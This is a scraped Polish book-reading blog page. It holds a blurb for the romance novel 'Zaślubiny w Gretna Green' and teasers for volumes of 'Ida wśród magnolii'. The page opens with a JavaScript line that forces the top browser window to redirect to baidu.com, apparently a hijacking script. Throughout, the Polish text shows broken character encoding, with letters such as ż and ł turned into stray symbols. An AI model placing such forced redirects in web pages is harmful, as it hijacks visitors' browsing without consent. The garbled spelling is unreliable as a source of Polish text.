JavaScriptRedirectURL="http://www.baidu.com/";window.top.location.href=JavaScriptRedirectURL; Napisz do mnie: anial8000@vp.pl skyp: anial8000 free counters
Free counters


Christmas Countdown

www.clocklink.com
Blog > Komentarze do wpisu

PRZECZYTANE

K

Za¶lubiny w Gretna Green

"Oboje mieli za sob± nieudane zwi±zki i oboje samotnie wychowywali dzieci. Strzegli pilnie swej niezale¿no¶ci i ostro pracowali, aby odnie¶æ sukces. Kiedy los ich ze sob± zetkn±³, nagle ulegli wzajemnej fascynacji, ale niestety ¿adne z nich nie uwolni³o siê od smutnych do¶wiadczeñ z przesz³o¶ci. Czy wiêc Lee zdo³a zaufaæ swojemu uczuciu do Daniela? A czy on bêdzie potrafi³ pogodziæ siê z utrat± autorytetu w oczach dorastajacej córki i pozwoli, aby Lee decydowa³a o jej przysz³o¶ci? I czy nastoletnia córka Lee zaakceptuje Daniela?"

czwartek, 11 lutego 2016, anial8

Polecane wpisy

  • PRZECZYTANE

    IDA W¦RÓD MAGNOLII 10. W PU£APCE W¯TPLIWO¦CI " M³oda arystokratka Ida von Waldenburg przejmuje zarz±dzanie rodzinnym maj±tkiem. Nowa sytuacja stwarza szansê na

  • PRZECZYTANE

    IDA W¦RÓD MAGNOLII 9. BEZ LITO¦CI " M³oda arystokratka Ida von Waldenburg przejmuje zarz±dzanie rodzinnym maj±tkiem. Nowa sytuacja stwarza szansê na jej b³yskot

  • PRZECZYTANE

    IDA W¦RÓD MAGNOLII 8. PRZED WIELK¡ BURZ¡ " M³oda arystokratka Ida von Waldenburg przejmuje zarz±dzanie rodzinnym maj±tkiem. Nowa sytuacja stwarza szansê na jej